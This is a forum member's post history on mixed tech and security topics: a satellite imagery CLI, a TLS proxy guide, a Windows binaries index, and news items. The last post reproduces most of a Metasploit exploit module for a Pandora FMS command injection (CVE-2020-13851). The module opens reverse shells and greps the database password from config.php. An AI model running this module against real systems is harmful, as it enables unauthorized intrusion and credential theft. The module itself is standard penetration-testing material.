
Kev
Active Members
Posts: 1026
Joined:
Days Won: 55

Everything posted by Kev

  1. Post a download link as well, I have a bit of free time.
  2. Kev

    COVID-19

    Hopeful, but you hope in vain :))) Yesterday evening (25/26.07.2020) they brought swine flu back into a village, confiscated some kilos of pigs and cows, etc. PS: another one is announced for around August next year.
  3. It has Satan in it: wmiprvse.exe
  4. Who should use this tool?

    TL;DR: Generate JPEG earth imagery from coordinates/location name with publicly available satellite data.

    This tool is for a sentient being who wants to view high-res satellite imagery of earth, without digging through all the nitty-gritty geospatial details of it. So if this is your first time trying to explore how parts of the Earth look from space, you're at the right place.

    NB: felicette at the present state searches for cloud-cover < 10%, and doesn't constrain results on the basis of dates. One can see the Product Roadmap for upcoming features.

    Installation

    felicette depends on GDAL, but the following steps cover GDAL's installation as well. rio-color uses numpy headers to set up, thus installing numpy and GDAL=={ogrinfo --version} would be sufficient before installing felicette.

    Debian

        $ sudo add-apt-repository ppa:ubuntugis/ppa
        $ sudo apt-get update
        $ sudo apt-get install python-numpy gdal-bin libgdal-dev
        $ gdal-config --version
        <version-number>
        * activate virtual environment *
        $ pip install numpy GDAL==<version-number>
        $ pip install felicette

    MacOS

        $ brew install gdal
        $ gdal-config --version
        <version-number>
        * activate virtual environment *
        $ pip install numpy GDAL==<version-number>
        $ pip install felicette

    Docker

    As pointed out here, the following docker image works and is volume-mapped to the present working directory. Thanks @milhouse1337 for the docker image.

    rio-color, one of felicette's dependencies, isn't available in the conda ecosystem yet. Here's the link to a small discussion on an installation issue. This section will be updated when there is a stable version of felicette for Windows. Felicette has plans to build in-house RGB image enhancement algorithms or use imagemagick / [similar tools on conda-forge] for a Windows release, at least until rio-color is available on conda-forge/conda.

    Usage

    To use it:

        $ felicette --help
        Usage: felicette [OPTIONS]

          Satellite imagery for dummies.

        Options:
          -c, --coordinates FLOAT...  Coordinates in (lon, lat) format. This overrides -l command
          -l, --location-name TEXT    Location name in string format
          -p, --pan-enhancement       Enhance image with panchromatic band
          -pre, --preview-image       Preview pre-processed low resolution RGB satellite image.
          -v, --vegetation            Show Color Infrared image to highlight vegetation
          --help                      Show this message and exit.

    Felicette can download and process Landsat images taking the location's input as (lon, lat) or the location name. They can be used in the following way.

    With location name:

        $ felicette -l "Kanyakumari"

    With coordinates:

        $ felicette -c 77.5385 8.0883

    The -p option uses the panchromatic band to enhance the image's resolution to 15 meters, contrary to the resolution of the RGB bands (30 meters). To get a better image using felicette use:

        $ felicette -p -c 77.5385 8.0883

    The -pre option downloads a low-res image for preview, to check if the image is worth your computation and network I/O.

        $ felicette -pre -p -c 77.5385 8.0883

    The -v option generates a CIR image to highlight vegetation in 'red' color. Note that the '-p' option isn't taken into consideration while generating CIR imagery in felicette.

        $ felicette -pre -v -l "Kanyakumari"

    History

    Félicette was the first cat launched into space, on 18 October 1963. Even though she landed back on earth safely, Félicette was euthanized two months after the launch so that scientists could perform a necropsy to examine her brain. She was the only cat to have survived spaceflight. Here's footage of the mission from the archives. When you get satellite imagery using this tool, imagine Félicette took the picture for you :)

    Preview and examples

    Here are some more sample images generated by felicette. Here is a link to the original images generated with the RGB and CIR options. Following is a recording of a terminal session showing usage of felicette: https://asciinema.org/a/349495

    Source
  5. https://www.fancourier.ro/wp-content/uploads/2019/02/Instalare-si-configurare-Woocommerce_EN.pdf

    /edit: some of the plugins:
    CMS Tree Page View
    Admin Menu Tree Page View
    Simple Fields
    Simple Fields Map extension
    Simple History
    Simple SEO (Search Engine Optimization)
    EP Admin Messages
    EP Social Widget
    Nice Navigation
    EP Hashimage
    EP Post Widget
    EP Display Users
    Hundstall 404
    EP Comments Export
    EP Image Base64 Encode

    The 50 most popular WordPress plugins:
    Akismet
    WordPress SEO by Yoast
    Contact Form 7
    Jetpack by WordPress.com
    Wordfence Security
    NextGEN Gallery
    MailPoet Newsletters
    All in One SEO Pack
    WP Super Cache
    WordPress Importer
    Google XML Sitemaps
    iThemes Security (formerly Better WP Security)
    WooCommerce - excelling eCommerce
    Meta Slider
    Fast Secure Contact Form
    WP-Optimize
    InfiniteWP Client
    WordPress Social Sharing Optimization
    WPtouch Mobile Plugin
    NextGEN Facebook: Advanced Optimization for All Social Websites
    Google Maps Ready!
    Captcha
    W3 Total Cache
    Shareaholic | share buttons & related posts
    MailChimp for WordPress
    UpdraftPlus Backup and Restoration for WordPress
    TinyMCE Advanced
    Broken Link Checker
    Contact Form
    Shortcodes Ultimate
    Ninja Forms
    All In One WP Security & Firewall
    WP Statistics
    Page Builder by SiteOrigin
    Google Analytics for WordPress
    WP Google Maps
    Really Simple CAPTCHA
    YouTube
    WP-PageNavi
    Breadcrumb NavXT
    Advanced Custom Fields
    All-in-One Event Calendar
    Google Analytics Dashboard for WP
    Regenerate Thumbnails
    User Role Editor
    Newsletter
    BuddyPress
    Sucuri Security - Auditing, Malware Scanner and Hardening
    The Events Calendar
    Black Studio TinyMCE Widget

    //edit: format your text when you post in the future
  6. So you're pentesting a .NET application, and you notice the server is deserializing user input—great! You know this is bad in theory, but have no idea how to actually get a shell in time for the engagement. This talk will bring you up to speed on how .NET deserialization works and how to get shells on real applications. In this presentation, we'll dig into the internals of CVE-2019-18935, a deserialization vulnerability that allows RCE on the popular web UI suite Telerik UI for ASP.NET AJAX. After demonstrating how to exploit this issue step-by-step, you'll learn a hands-on approach to debugging a locally running ASP.NET application, quickly assessing the site's attack surface, and examining possible avenues for finding and exploiting insecure uses of deserialization. This talk is intended for penetration testers and security researchers who'd like to begin testing deserialization vulnerabilities in .NET software. Source
  7. PolarProxy is primarily a TLS forward proxy, but it can also be used as a TLS termination proxy or reverse TLS proxy to intercept and decrypt incoming TLS traffic, such as HTTPS or IMAPS, before it is forwarded to a server. The proxied traffic can be accessed in decrypted form as a PCAP formatted data stream, which allows real-time analysis of the decrypted traffic by an IDS as well as post-incident forensics with Wireshark.

    PolarProxy version 0.8.15 and later can import an existing X.509 server certificate (aka leaf certificate or end-entity certificate) in order to perform the TLS decryption using a valid certificate signed by a trusted certificate authority. If no server certificate is provided, then PolarProxy falls back to generating server certificates on the fly and signing them with its own root CA certificate.

    There are two principal ways to run PolarProxy as a reverse proxy, either as a TLS termination proxy or as a reverse proxy that decrypts and re-encrypts the traffic.

    PolarProxy as a TLS Termination Proxy

    The TLS termination proxy mode is useful in order to offload the task of performing TLS encryption to PolarProxy instead of doing the decryption on the web server. This mode can also be used when the proxied services don't support TLS encryption, such as legacy web servers or servers hosting other unencrypted services that you want to secure with TLS.

    The following command sequence shows how to create a Let's Encrypt SSL certificate, convert it to the PKCS#12 format, and load the server certificate into PolarProxy to terminate incoming HTTPS connections. In this setup PolarProxy decrypts the TLS traffic and relays the HTTP traffic to the web server on TCP port 80.

        sudo certbot certonly --manual --preferred-challenges dns -d example.com,www.example.com
        sudo openssl pkcs12 -export -out /etc/example.p12 -inkey /etc/letsencrypt/live/example.com/privkey.pem -in /etc/letsencrypt/live/example.com/fullchain.pem --passout pass:PASSWORD
        sudo mkdir /var/log/TlsTerminationProxy/
        sudo ./PolarProxy --terminate --connect 10.1.2.3 --nosni www.example.com --servercert example.com,www.example.com:/etc/example.p12:PASSWORD -p 443,80,80 -o /var/log/TlsTerminationProxy/

    Here's a breakdown of the arguments sent to PolarProxy:

    --terminate : Terminate incoming TLS sessions and forward proxied traffic in unencrypted form.
    --connect 10.1.2.3 : Forward all proxied traffic to 10.1.2.3 instead of connecting to the host name provided in the SNI extension of the TLS ClientHello message.
    --nosni www.example.com : Treat incoming TLS sessions that don't define a host name with the SNI extension as if they want to connect to "www.example.com".
    --servercert example.com,www.example.com:/etc/example.p12:PASSWORD : Use the server certificate "/etc/example.p12" for incoming connections to "example.com" and "www.example.com".
    -p 443,80,80 : Listen on TCP port 443, save decrypted traffic in the PCAP file as if it was directed to port 80, forward decrypted traffic to port 80.
    -o /var/log/TlsTerminationProxy/ : Save decrypted traffic to hourly rotated PCAP files in "/var/log/TlsTerminationProxy/".

    PolarProxy is a generic TLS proxy that doesn't care what application layer protocol the TLS tunnel carries. So if you want to terminate the TLS encryption of incoming IMAPS sessions as well, then simply append an additional argument saying "-p 993,143,143" to also forward decrypted IMAP sessions to 10.1.2.3. This method can be used in order to wrap almost any TCP-based protocol in a TLS tunnel, which can be useful for privacy reasons as well as to prevent network monitoring tools from detecting the actual application layer protocol.

    PolarProxy as a Reverse TLS Proxy

    There are setups for which it is preferable to also encrypt the internal sessions between PolarProxy and the final server. One such setup is when the server is hosting a web service with support for the HTTP/2 protocol, which in practice always uses TLS. Luckily PolarProxy is designed to decrypt and re-encrypt proxied traffic while also forwarding important TLS parameters, such as ALPN and SNI, between the internal and external TLS sessions.

    To use TLS encryption on the inside as well as outside of PolarProxy, simply do as explained in the previous TLS termination section, but remove the "--terminate" argument and change the port argument to "-p 443,80,443" like this:

        sudo ./PolarProxy --connect 10.1.2.3 --nosni www.example.com --servercert example.com,www.example.com:/etc/example.p12:PASSWORD -p 443,80,443 -o /var/log/ReverseTlsProxy/

    PolarProxy will save the decrypted traffic as cleartext HTTP (or HTTP/2) to PCAP files in the "/var/log/ReverseTlsProxy/" directory.

    Real-Time Analysis of Decrypted Traffic

    Both the external (client-to-proxy) and internal (proxy-to-server) TCP sessions, in the reverse TLS proxy example above, are encrypted with TLS. This prevents passive network security monitoring tools, such as IDSs, DPI and DLP appliances, from analyzing the application layer data being sent and received. The PCAP files written to "/var/log/ReverseTlsProxy/" can be a valuable forensic asset when investigating an incident, but a real-time stream of the decrypted data is needed in order to swiftly detect and alert on potential security breaches and other incidents. PolarProxy's "--pcapoverip" option can be used to provide such a real-time stream of the decrypted data passing through the proxy. This data can easily be sent to a network interface using tcpreplay, as explained in our blog post "Sniffing Decrypted TLS Traffic with Security Onion".

    Security Considerations

    The examples shown in this blog post all run PolarProxy with root privileges using sudo, which can be dangerous from a security perspective. PolarProxy is actually designed to be run without root privileges, but doing so prevents it from listening on a port below 1024. Luckily, this issue can easily be overcome with a simple port forwarding or redirect rule. The following iptables redirect rule can be used if PolarProxy is listening on TCP port 20443 and incoming HTTPS requests are arriving on the eth0 interface of the proxy:

        iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to 20443

    PolarProxy does not support loading settings from a config file. The password for the PKCS#12 certificate will therefore need to be supplied on the command line, which can make it visible in a process listing. If this is a concern for you, then please consider using "hidepid" to hide processes from other users. You can find instructions on how to use hidepid in hardening guides for Debian, Arch, SUSE and most other Linux flavors.

    Source
  8. I know this from inside a call center (an Italian company): those who answered with "Yes" were kept recorded before being told, and for those who answered with "Hello" the call was hung up. Audio montages are made and the number gets ported from one company to another, then they wake up with bills they know nothing about. In other words, fraud.
  9. Kev

    Useful stuff

    Yes indeed, my apologies / I know that in physics class we got it out of potatoes, that's why I fell for it // the Indian guy is doing dropshipping on Amazon, I just noticed it in the description
  10. Kev

    Useful stuff

    About

    Law enforcement surveillance isn't always secret. These technologies can be discovered in news articles and government meeting agendas, in company press releases and social media posts. It just hasn't been aggregated before. That's the starting point for the Atlas of Surveillance, a collaborative effort between the Electronic Frontier Foundation and the University of Nevada, Reno Reynolds School of Journalism. Through a combination of crowdsourcing and data journalism, we are creating the largest-ever repository of information on which law enforcement agencies are using what surveillance technologies. The aim is to generate a resource for journalists, academics, and, most importantly, members of the public to check what's been purchased locally and how technologies are spreading across the country. We specifically focused on the most pervasive technologies, including drones, body-worn cameras, face recognition, cell-site simulators, automated license plate readers, predictive policing, camera registries, and gunshot detection. Although we have amassed more than 5,000 datapoints in 3,000 jurisdictions, our research only reveals the tip of the iceberg and underlines the need for journalists and members of the public to continue demanding transparency from criminal justice agencies.

    https://atlasofsurveillance.org
  11. The man told you clearly: the difference. Re-read it.
  12. Traditional financial crime and cyberattacks are converging, requiring new skills and approaches to the problem, officials said. The U.S. Secret Service has created the Cyber Fraud Task Forces (CFTFs), aimed at preventing, detecting and mitigating complex cyber-enabled financial crime, including making arrests and securing convictions.

    The CFTF is the result of a formal merging of two of the Secret Service's existing units into a single unified network: the Electronic Crimes Task Forces (ECTFs) and the Financial Crimes Task Forces (FCTFs), the division said in a recent media statement. The driver for the move is the fact that online cybercrime and financial fraud have converged to the point that it's impossible to address one without including the other, it said. In fact, nearly all of the Secret Service's traditional financial crime investigations make use of digital evidence, and the group acknowledged that increasing technological sophistication on the part of bad actors has led to a proliferation of blended cyber-enabled financial crimes. Those include business email compromise (BEC) scams, ransomware attacks, data breaches and the sale of stolen credit cards and personal information on the internet. Keith McCammon, chief security officer and co-founder of Red Canary, said that an overwhelming majority of threat actors are financially motivated.

    The Secret Service also said that it has broken up "hundreds" of COVID-19-related cyber-fraud scams since March, when coronavirus lockdowns went into place around the country. It has thus prevented tens of millions of dollars in fraud from occurring, officials said. In terms of specific wins, the Secret Service has halted the illicit online sales of stolen COVID-19 test kits, and is now leading a "nationwide effort to investigate and counter a vast transnational unemployment fraud scheme targeting the U.S. state unemployment programs," according to the Secret Service.

    The Secret Service has 42 domestic CFTF locations and two international locations, in London and Rome. The law-enforcement group said that it plans to further extend the CFTF network to include as many as 160 offices across the country and around the globe.

    Via threatpost.com
  13. I indexed all Windows files which appear in Windows update packages, and created a website which lets you quickly view information about the files and download some of them from Microsoft servers. The files that can be downloaded are executable files (currently exe, dll and sys files). Read on for further information.

    Motivation

    During a recent research project, I had to track down a bug that Microsoft fixed in one of the drivers. I needed to find out which update fixed the bug. I knew that the bug exists on an unpatched RTM build, and is fixed on a fully patched system. All I needed was the dozens of file versions of that driver, so that I could look at them manually until I found the version that introduced the fix. Unfortunately, to the best of my knowledge there was no place where one could get just these dozens of files without downloading extra GBs of data, be it ISOs or update packages. While searching for the simplest solution, these are the options I considered:

    1. Install an unpatched RTM build with automatic updates disabled, and install each update manually. Get the driver file after each installed update. A more efficient option would be to do a binary search, installing the middle update first, and then continuing with the relevant half of the updates depending on whether that update fixed the bug.
    2. Extract each version of the file from a Windows package, such as an update package that can be downloaded from the Microsoft Update Catalog or an archive from the Unified Update Platform.
    3. Look for the driver files on the internet. There are various fishy "dll fixer" websites that claim to provide versions of system files. Unfortunately, not only are these websites mostly loaded with ads and the files sometimes wrapped in a suspicious exe, they also don't provide any variety of versions for a given file, usually having only one, seemingly randomly selected version. There are also potentially useful services like VirusTotal, but I didn't find any such service which allows you to freely download the files.

    Option 3 didn't work, and I chose option 2 over 1 since downloading and extracting update packages seemed quicker than updating the OS every time. I also chose the Microsoft Update Catalog over the Unified Update Platform, since the latter is not really documented and is more obscure, and other than that provides no obvious benefits. Also, the update history is nicely documented by Microsoft: Windows 10 update history. There's also Windows 7 SP1 update history and Windows 8.1 update history, but I focused on Windows 10.

    What's in an update package

    Each update package that can be downloaded from the Microsoft Update Catalog is an msu file, which is basically a cab archive. Extracting it results in some metadata and another cab archive, which in turn contains the Windows files of the update. The update files are divided into assemblies, each assembly having a manifest file and a folder with the actual files. I expected that it would be enough to grab the file I'm looking for from the corresponding folder, but it turns out that newer update packages contain forward and reverse differentials instead of the actual files. Only 6 KB, no MZ header, clearly not the file I'm looking for. A quick search about the diff patching algorithm didn't yield results, and I'd need the base Windows version anyway, so this option didn't look appealing anymore. Just before giving up and trying the other options (the Unified Update Platform and installing updates manually), I looked at the information that is available in the manifest file.
    The only potentially interesting piece of information that I found is the list of files, which, among various unhelpful (for me) information, contains the file's SHA256 hash:

        <?xml version="1.0" encoding="utf-8" standalone="yes"?>
        <assembly xmlns="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0" copyright="Copyright (c) Microsoft Corporation. All Rights Reserved.">
          <assemblyIdentity name="Microsoft-Windows-SMBServer-v2" version="10.0.19041.153" processorArchitecture="amd64" language="neutral" buildType="release" publicKeyToken="31bf3856ad364e35" versionScope="nonSxS" />
          <dependency discoverable="no" resourceType="Resources">
            <!-- ... -->
          </dependency>
          <file name="srv2.sys" destinationPath="$(runtime.drivers)\" sourceName="srv2.sys" importPath="$(build.nttree)\" sourcePath=".\">
            <securityDescriptor name="WRP_FILE_DEFAULT_SDDL" />
            <asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
              <dsig:Transforms>
                <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
              </dsig:Transforms>
              <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
              <dsig:DigestValue>pD5a0dKSCg7Kc0g1yDyWEX8n8ogPj/niCIy4yUR7WvQ=</dsig:DigestValue>
            </asmv2:hash>
          </file>
          <memberships>
            <!-- ... -->
          </memberships>
          <instrumentation xmlns:ut="http://manifests.microsoft.com/win/2004/08/windows/networkevents" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema">
            <!-- ... -->
          </instrumentation>
          <localization>
            <!-- ... -->
          </localization>
          <trustInfo>
            <!-- ... -->
          </trustInfo>
        </assembly>

    You can see it under DigestValue, encoded as base64. In this case, that's pD5a0dKSCg7Kc0g1yDyWEX8n8ogPj/niCIy4yUR7WvQ= which translates to a43e5ad1d2920a0eca734835c83c96117f27f2880f8ff9e2088cb8c9447b5af4. Can a SHA256 hash help me get the file?
Maybe… The Microsoft Symbol Server Having some experience with the Microsoft Symbol Server, I know that it doesn’t only store symbol files, but also the PE (Portable Executable) files themselves. You can refer to the great article Symbols the Microsoft Way by Bruce Dawson for more details, but the most important detail for us is that the format for the path to each PE file in a symbol server is: “%s\%s\%08X%x\%s” % (serverName, peName, timeStamp, imageSize, peName) This means that all we need to retrieve the file from the Microsoft Symbol Server is to know the file’s timestamp and image size. But at this point, we only have the file’s SHA256 hash. VirusTotal to the rescue VirusTotal is a well known service for scanning files and URLs with multiple antivirus products and online scan engines. In addition to the scan results, VirusTotal displays some information about the submitted files. For PE files, it displays information such as imports and resources, but more importantly, it also displays the files’ timestamp and a list of sections. The latter can be used to calculate the file’s image size. In addition, if the file was scanned with VirusTotal before, the information can be retrieved by providing the file hash. That means that for each file previously scanned by VirusTotal, the SHA256 hash is enough to deduce the correct path on the Microsoft Symbol Server and download the file. Back to our example, the a43e5ad1d2920a0eca734835c83c96117f27f2880f8ff9e2088cb8c9447b5af4 hash can be found on VirusTotal, and the parameters that we need are the creation time: Creation Time: 2096-10-28 20:47:11 And the last section in the list of sections: Name: .reloc Virtual Address: 798720 Virtual Size: 12708 … You can Google for an “epoch converter” to convert the creation time to an epoch timestamp: 4002295631, or in hex: 0xee8e2f4f. You might need to append “GMT” to prevent the converter from reading the creation time as a local time. 
To calculate the image size, just add the virtual address and size of the last section: 798720+12708 = 811428 = 0xc61a4, and then align to the size of a page, which is 0x1000: 0xc7000. Combining the above, we can now build our download link: https://msdl.microsoft.com/download/symbols/srv2.sys/EE8E2F4Fc7000/srv2.sys Here’s a simple Python script which generates a Microsoft Symbol Server link from a file name and a file hash, automating what we just did manually. P.S. In case you’re wondering how come the file was created in 2096, it wasn’t. Starting with Windows 10, the timestamps of the system’s PE files are actually file hashes, a change that was made to allow reproducible builds. For more details see Raymond Chen’s blog post, Why are the module timestamps in Windows 10 so nonsensical?. P.P.S. If you read Bruce Dawson’s article, you saw that he talked about possible collisions in case there are two different files with the same timestamp and image size. He also described how Chrome had this exact problem. But Chrome used real timestamps, what about the pseudo-timestamps which are in fact file hashes that Windows 10 is using? In Windows’ case there are many collisions. I stumbled upon one, and got curious about the actual amount of such collisions, so I wrote a script to find all of them. Here’s the result, 3408 collisions! For most collisions (all but 54) the only different section is .rsrc which contains resource information, which means that the code and the data are the same. Perhaps the hashing algorithm isn’t affected by that section. I took one specific example (aitstatic.exe) and compared my system’s file (in a collision list) with the file served by the symbol server. The two had a different file version, the file served by the symbol server wasn’t signed, and the checksum (the real checksum field in the PE header, not the timestamp-checksum) was different. 
    Also the file that was served by the symbol server was different than all of the files that I found in update packages. Looks like the symbol server sometimes returns a development file instead of a production one, which might be unsigned and have a different version. It might be confusing, and I've been bitten by this once, so remember: never trust the version of a file you download from the Microsoft Symbol Server. The other 54 collisions are of .NET PE files, and in this case other sections are different as well. But that doesn't really matter, since they're not available via the symbol server at all.

    Building an index

    That's how I solved my problem, downloading several update packages and getting the driver files with the help of VirusTotal. But since all the files are so conveniently available via the Microsoft Symbol Server, I thought that it would be nice to index all of the files once, making the links for all PE files and versions available and saving myself and others from having to go through the procedure in the future. All I had to do was get the list of updates from the Windows 10 update history page (for now, I looked only at Windows 10 updates), download these updates from the Microsoft Update Catalog, fetch the file names and hashes, query VirusTotal for these hashes, and make some nice interface to search in this index and generate links.

    Getting the list of updates

    That was the easy part, a simple Python script did the job. A funny thing I noticed is that the help page titles are edited manually, since they're almost uniform, but some of them contain minor mistakes. Here are two examples of pages with a properly formatted title:

        June 18, 2020—KB4567523 (OS Build 19041.331)
        May 19, 2019—KB4505064 (OS Build 17134.766)

    And here are a couple of examples of titles with minor mistakes:

        May 21, 2019—KB4497934 (OS Build OS 17763.529)        (an extra "OS")
        September 29, 2016 — KB3194496 (OS Builds 14393.222)  ("Builds", but just one build)
        January 26, 2017—KB 3216755 (OS Build 14393.726)      (the only entry with a space after "KB")
        July 16, 2019—KB4507465 (OS Build 16299.1296 )        (a space before ")")

    Downloading the updates from the Microsoft Update Catalog

    Most updates are available for three architectures: x86, x64 and ARM64. There are also updates for Windows Server in addition to Windows 10, but most, if not all of them are the same files for both Windows 10 and Windows Server. For now, I decided to limit the scope to x64. This part wasn't as easy as the previous one, mainly because it's so time consuming. In addition, it turned out that not all of the updates are available in the Microsoft Update Catalog. Out of the 502 updates available for Windows 10 while writing these lines, only 355 are available for x64. Out of the 147 which aren't available, 27 are for Windows 10 Mobile (discontinued), one is only for x86, and one is only for Windows Server 2016. The other 118 are truly missing, 2 of which have a "no longer available" notice, and the others' absence is not explained. Here is a detailed table with all of the updates and their availability for x64.

    Querying VirusTotal

    There are files of various types in the update packages, including non-PE files such as txt and png. For now, I decided to focus on exe, dll and sys which are the most common PE file types, even though there are other PE file types such as scr. Querying VirusTotal is quite simple, as I demonstrated with the Python script in the previous section about VirusTotal. The problem was that I needed to query information about 134,515 files, which is not a small amount. I was afraid of strict rate limiting, but fortunately, the rate limiting wasn't so strict. After a while I got a response similar to the following:

        {
          "error": {
            "code": "TooManyRequestsError",
            "message": "More than 1000 requests from 66.249.66.153 within a hour"
          }
        }

    So no more than 1000 requests within an hour, which means 5.5 days of downloading. I could use more computers, but that would be inconvenient. Even though it's not too bad, I was uncomfortable seeing my script waiting every hour for the next quota of 1000 requests, so I used PyMultitor, the Python Multi Threaded Tor Proxy tool created by Tomer Zait. I heard about the tool a while ago, and finally had the perfect use case for it. I was pleasantly surprised how stable and easy to use it is (stability should also be attributed to the Tor project). With PyMultitor, I was able to reduce the time to 3 days of downloading.

    Of course, no data is returned if a file was never submitted to VirusTotal. Out of the 134,515 files, 108,470 were submitted, which is a success rate of 80.6%. Not bad! Also, 190 of the files were submitted, but the report for them didn't contain details about the PE format. Rescanning them solved the problem.

    The result

    After building the index of files, I created a simple website which displays the data in a table. Here it is: Winbindex - the Windows Binaries Index. All the files that were found in the update packages are listed, but currently only exe, dll and sys files have download links, except for those that weren't submitted to VirusTotal.

    Possible further work

    I think that the index can already be very useful, but it's not complete. Here are some things that can be done to further improve it:

    - Indexing files from base builds. Currently, files which don't appear in any update package, but appear in the initial Windows release aren't indexed. To fill the gap, I'll probably have to get the corresponding ISO files of the initial Windows releases.
    - Indexing files which aren't available on VirusTotal. There are several possible options here: automating a VM that updates itself and grabs all the files; understanding the diff algorithm to be able to get all the files from the update packages; using the Unified Update Platform, although I'm not familiar enough with it to say if it can help with this.
    - Indexing files of other architectures: x86 and ARM64, and of other Windows versions: Windows 7, Windows 8/8.1.

    I don't plan to do any of that in the near future, but I might do that one day when I stumble upon another task which requires it.

    Source m417z.com
  14. The reticulate package provides a comprehensive set of tools for interoperability between Python and R. With reticulate, you can call Python from R in a variety of ways including importing Python modules into R scripts, writing R Markdown Python chunks, sourcing Python scripts, and using Python interactively within the RStudio IDE. This cheatsheet will remind you how. Updated March 19. Download: reticulate.pdf (3.92 MB) Source
  15. Editorial Reviews

About the Author

Kazuo Sakiyama: Associate Professor, The University of Electro-Communications, Tokyo, Japan. Dr Sakiyama’s area of expertise includes digital circuit design, cryptographic embedded systems, and secure computing. He has been working on digital circuit design since 1996. Since 2001 he has focused on cryptographic embedded systems, and has been teaching hardware security in several lectures of advanced cryptography and PBL (project-based learning) courses.

Yu Sasaki: Researcher, NTT Secure Platform Laboratories, NTT Corporation, Tokyo, Japan. He has been working on cryptography since 2004. His research interest has focused on security evaluation of cryptographic protocols and cryptanalysis of symmetric-key primitives.

Yang Li: Research Assistant, The University of Electro-Communications, Japan.

Download
  16. This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pandora FMS Events Remote Command Execution',
        'Description' => %q{
          This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions
          7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to
          execute arbitrary commands. This module takes advantage of a command injection
          vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to
          execute arbitrary commands via the `target` parameter in HTTP POST requests to
          the `Events` function. After authenticating to the target, the module attempts
          to exploit this flaw by issuing such an HTTP POST request, with the `target`
          parameter set to contain the payload. If a shell is obtained, the module will
          try to obtain the local MySQL database password via a simple `grep` command on
          the plaintext `/var/www/html/pandora_console/include/config.php` file.
          Valid credentials for a Pandora FMS account are required. The account does not
          need to have admin privileges. This module has been successfully tested on
          Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for
          this version).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Fernando Catoira', # Discovery
          'Julio Sanchez', # Discovery
          'Erik Wynter' # @wyntererik - Metasploit
        ],
        'References' => [
          ['CVE', '2020-13851'], # RCE via the `events` feature
          ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
        ],
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
        'Targets' => [
          [
            'Linux (x86)', {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux (x64)', {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux (cmd)', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2020-06-04',
        'DefaultTarget' => 1
      )
    )

    register_options [
      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])
    ]
  end

  def check
    vprint_status('Running check')
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')

    unless res
      return CheckCode::Unknown('Connection failed.')
    end

    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
      return CheckCode::Safe('Target is not a Pandora FMS application.')
    end

    @cookie = res.get_cookies

    html = res.get_html_document
    full_version = html.at('div[@id="ver_num"]')
    if full_version.blank?
      return CheckCode::Detected('Could not determine the Pandora FMS version.')
    end

    full_version = full_version.text
    version = full_version[1..-1].sub('NG', '')
    if version.blank?
      return CheckCode::Detected('Could not determine the Pandora FMS version.')
    end

    version = Gem::Version.new version
    unless version <= Gem::Version.new('7.0.744')
      return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")
    end

    CheckCode::Appears("Target is Pandora FMS version #{full_version}.")
  end

  def login(user, pass)
    vprint_status "Authenticating as #{user} ..."
    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'cookie' => @cookie,
      'vars_get' => { 'login' => '1' },
      'vars_post' => {
        'nick' => user,
        'pass' => pass,
        'login_button' => 'Login'
      }
    })

    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')
      fail_with Failure::NoAccess, 'Authentication failed'
    end

    print_good "Authenticated as user #{user}."
  end

  def on_new_session(client)
    super
    if target.arch.first == ARCH_CMD
      print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
      client.shell_write("grep dbpass include/config.php\n")
    else
      print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')
    end
  end

  def execute_command(cmd, _opts = {})
    print_status('Executing payload...')
    send_request_cgi({
